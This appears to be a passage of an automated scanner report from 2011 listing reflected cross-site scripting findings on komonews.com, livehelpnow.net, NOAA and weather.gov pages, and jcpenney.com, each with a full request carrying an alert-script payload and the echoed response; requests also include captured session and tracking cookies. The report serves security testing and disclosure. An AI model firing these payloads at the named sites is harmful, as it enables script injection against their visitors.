GET /sports/116713754.html?39190"><script>alert(1)</script>7100ee4ab24=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55390
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bdbd"><script>alert(1)</script>af961e96cd7 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /younews?cid=71571&c=y3bdbd"><script>alert(1)</script>af961e96cd7 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:14:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 87936
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90184"><script>alert(1)</script>ad8c8f43e27 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /younews?cid=7157190184"><script>alert(1)</script>ad8c8f43e27&c=y HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 23 Feb 2011 22:14:30 GMT X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:14:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 64186
1.489. http://www.komonews.com/younews [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/younews
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 166b0"><script>alert(1)</script>31adaeb700e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /younews?cid=71571&c=y&166b0"><script>alert(1)</script>31adaeb700e=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 23 Feb 2011 22:14:54 GMT X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:14:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 87940
The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fed0"%3balert(1)//c80c608b952 was submitted in the lhnid parameter. This input was echoed as 4fed0";alert(1)//c80c608b952 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=60&lhnid=12884fed0"%3balert(1)//c80c608b952&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php?40caf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E570f923664=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Date: Sat, 26 Feb 2011 14:15:54 GMT Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 9822
var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0;
function pa ...[SNIP]... <img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=173.193.214.243|12884fed0";alert(1)//c80c608b952|2/26/2011 9:15:54 AM' /> ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93b1c'%3balert(1)//2105fc1f4f4 was submitted in the t parameter. This input was echoed as 93b1c';alert(1)//2105fc1f4f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=60&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f93b1c'%3balert(1)//2105fc1f4f4 HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php?40caf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E570f923664=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Date: Sat, 26 Feb 2011 14:16:04 GMT Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 9570
var lhnTrack='f93b1c';alert(1)//2105fc1f4f4'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0;
The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d46f1%3balert(1)//fb51e427c5d was submitted in the zimg parameter. This input was echoed as d46f1;alert(1)//fb51e427c5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=60d46f1%3balert(1)//fb51e427c5d&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php?40caf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E570f923664=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Date: Sat, 26 Feb 2011 14:15:53 GMT Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 9650
var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0;
1.493. http://www.ndbc.noaa.gov/rss/ndbc_obs_search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ndbc.noaa.gov
Path:
/rss/ndbc_obs_search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the XML document as plain text between tags. The payload d6e4c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>04979842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6e4c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>04979842 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /rss/ndbc_obs_search.php/d6e4c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>04979842 HTTP/1.1 Host: www.ndbc.noaa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s={"v":1,"rid":"1298668135765_72177","pv":1,"to":3,"c":"http://www.noaa.gov/","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1298668316368};
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 02:29:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Cache-Control: max-age=600, must-revalidate Expires: Sat, 26 Feb 2011 02:39:20 GMT Vary: Accept-Encoding Content-Length: 1650 Connection: close Content-Type: text/xml
1.494. http://www.weather.gov/view/national.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.weather.gov
Path:
/view/national.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2293"%20a%3db%20405471de5b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2293" a=b 405471de5b4 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /view/national.php/b2293"%20a%3db%20405471de5b4 HTTP/1.1 Host: www.weather.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Age: 0 X-Cache-TTL: 600 Date: Sat, 26 Feb 2011 02:30:09 GMT Content-Length: 16299 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 26 Feb 2011 02:40:09 GMT Cache-Control: max-age=600 Connection: close Server: Apache Vary: Accept-Encoding Via: 1.1 nws-hq-cache03 (NetCache NetApp/6.0.7) X-Cached-Time: Sat, 26 Feb 2011 02:30:09 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!-- InstanceBegin template="/Temp ...[SNIP]... <a href="/view/national.php/b2293" a=b 405471de5b4?prod=QPF&sid=ERD"> ...[SNIP]...
1.495. http://www.weather.gov/view/states.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.weather.gov
Path:
/view/states.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c14"%20a%3db%201efb074e0de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c14" a=b 1efb074e0de in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /view/states.php/78c14"%20a%3db%201efb074e0de HTTP/1.1 Host: www.weather.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Age: 0 X-Cache-TTL: 600 Date: Sat, 26 Feb 2011 02:32:11 GMT Content-Length: 23972 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 26 Feb 2011 02:42:11 GMT Cache-Control: max-age=600 Connection: close Server: Apache Vary: Accept-Encoding Via: 1.1 nws-hq-cache01 (NetCache NetApp/6.0.7) X-Cached-Time: Sat, 26 Feb 2011 02:32:11 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!-- InstanceBegin template="/Te ...[SNIP]... <a href="/view/states.php/78c14" a=b 1efb074e0de?state=AL"> ...[SNIP]...
1.496. http://www.weather.gov/view/validProds.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.weather.gov
Path:
/view/validProds.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32472"%20a%3db%20fbe5d3494a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32472" a=b fbe5d3494a4 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /view/validProds.php/32472"%20a%3db%20fbe5d3494a4 HTTP/1.1 Host: www.weather.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Age: 20 X-Cache-TTL: 580 Date: Sat, 26 Feb 2011 02:32:57 GMT Content-Length: 30061 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 26 Feb 2011 02:42:57 GMT Cache-Control: max-age=600 Connection: close Server: Apache Vary: Accept-Encoding Via: 1.1 nws-hq-cache01 (NetCache NetApp/6.0.7) X-Cached-Time: Sat, 26 Feb 2011 02:33:17 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!-- InstanceBegin template="/Te ...[SNIP]... <a href="/view/validProds.php/32472" a=b fbe5d3494a4?prod=ABV"> ...[SNIP]...
1.497. http://www.wrh.noaa.gov/sew/main.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wrh.noaa.gov
Path:
/sew/main.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff97e"><script>alert(1)</script>4bc70615a2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sew/main.php/ff97e"><script>alert(1)</script>4bc70615a2f HTTP/1.1 Host: www.wrh.noaa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=1199 Expires: Wed, 23 Feb 2011 23:25:10 GMT Date: Wed, 23 Feb 2011 23:05:11 GMT Content-Length: 20383 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>National Weather Service - Western Region Headquarters</title><link rel='STYLESHEET' type ...[SNIP]... <a href="http://www.wrh.noaa.gov/sew/main.php/ff97e"><script>alert(1)</script>4bc70615a2f?wfo=&sid=&pil=&zone=&lat=&lon=&date=&format=printer"> ...[SNIP]...
The value of the function request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e9d26%3balert(1)//15808bcbf87 was submitted in the function parameter. This input was echoed as e9d26;alert(1)//15808bcbf87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jcp/getjcpheaderc.aspx?function=getmenuitemse9d26%3balert(1)//15808bcbf87&ver=20110225&fx=3 HTTP/1.1 Host: www2.jcpenney.com Proxy-Connection: keep-alive Referer: http://www2.jcpenney.com/jcp/x2.aspx?DeptID=70656&CatID=70656&cmAMS_T=G1&cmAMS_C=D1B&mscssid=6781f8d69adfb4b56a7c960f89a4dcae2xMnVNoV5a3oxMnVNoV5a3W200B58E3AFFEDC3F853B83DAF37AF65E61271105704&cmAMS_V= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC" Cache-Control: private Expires: Sat, 26 Feb 2011 16:53:15 GMT Content-Type: text/html; charset=utf-8 ntCoent-Length: 56 Vary: Accept-Encoding Date: Sat, 26 Feb 2011 04:53:15 GMT Connection: close Content-Length: 56
Error function : getmenuitemse9d26;alert(1)//15808bcbf87
The value of the function request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ab880%3balert(1)//76fd0243f43 was submitted in the function parameter. This input was echoed as ab880;alert(1)//76fd0243f43 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jcp/getjcpheaderc.aspx?function=getmenuitemsab880%3balert(1)//76fd0243f43&ver=20110225&fx=3 HTTP/1.1 Host: www4.jcpenney.com Proxy-Connection: keep-alive Referer: http://www4.jcpenney.com/jcp/x2.aspx?DeptID=70676&CatID=70676&cmAMS_T=G1&cmAMS_C=D6B&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105702&cmAMS_V= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC" Cache-Control: private Expires: Sat, 26 Feb 2011 16:54:54 GMT Content-Type: text/html; charset=utf-8 ntCoent-Length: 56 Date: Sat, 26 Feb 2011 04:54:54 GMT Connection: close Vary: Accept-Encoding Content-Length: 56
Error function : getmenuitemsab880;alert(1)//76fd0243f43
The value of the CmCatId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a2ac'%3balert(1)//283a8961974 was submitted in the CmCatId parameter. This input was echoed as 7a2ac';alert(1)//283a8961974 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|723847a2ac'%3balert(1)//283a8961974 HTTP/1.1 Host: www5.jcpenney.com Proxy-Connection: keep-alive Referer: http://www4.jcpenney.com/jcp/XGN.aspx?n=4294953363&catsel=4294953363--comforters+++bedspreads&deptid=70750&pcatid=70750&catid=72384&cattyp=SAL&dep=BEDDING&pcat=BEDDING&cat=Sale&refpagename=Default%252Easpx&refdeptid=&refcatid=&cmAMS_T=T1&cmAMS_C=C3&CmCatId=homepage Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IsFirstTime=; JCPCluster=www4.jcpenney.com; JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; stop_mobi=yes; AKJCP=3fBztb4pZ7Tf6L2HhgR4EKVxTpNnQSz5KgvkmBSB09OHel5cMR4Pj8Q
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC" Cache-Control: private Expires: Sat, 26 Feb 2011 17:11:05 GMT Content-Type: text/html; charset=utf-8 ntCoent-Length: 255179 Vary: Accept-Encoding Date: Sat, 26 Feb 2011 05:11:06 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JCPSession=ShopperID=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105705&ShopperType=XGN255&InitialShopperId=0f3720e7c71e45edb02b68f7b004135c&DateShopperIdAssigned=02%2F25%2F2011; domain=.jcpenney.com; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/jcp Content-Length: 255179
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>JCPenney : 400TC WrinkleGuard Bedding Collection</title> <meta content="Microsoft Visual Studio .NET 7.1" ...[SNIP]... 0B181A7FD6BCDF0818AD551CB2274291EC1105705'); R3_COMMON.addPlacementType('ensemble_page.content1'); R3_COMMON.addClickthruParams(0, escape('cmOrigId=1a6ddbd&cmTypeFlag=RichRel&cmCatID=homepage|723847a2ac';alert(1)//283a8961974')); R3_COMMON.setClickthruServer('http://www5.jcpenney.com/jcp/'); var R3_ENSEMBLE = new r3_ensemble(); R3_ENSEMBLE.setId('1a6ddbd'); R3_ENSEMBLE.setRecommendable('True'); R3_ENSEMBLE.addCat ...[SNIP]...
The value of the function request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 79965%3balert(1)//e336fdf9c7 was submitted in the function parameter. This input was echoed as 79965;alert(1)//e336fdf9c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC" Cache-Control: private Expires: Sat, 26 Feb 2011 16:57:35 GMT Content-Type: text/html; charset=utf-8 Cteonnt-Length: 55 Date: Sat, 26 Feb 2011 04:57:35 GMT Connection: close Vary: Accept-Encoding Content-Length: 55
Error function : getmenuitems79965;alert(1)//e336fdf9c7
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2150'%3bcdde0a49e5 was submitted in the REST URL parameter 5. This input was echoed as a2150';cdde0a49e5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dd58'-alert(1)-'8a44710014e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
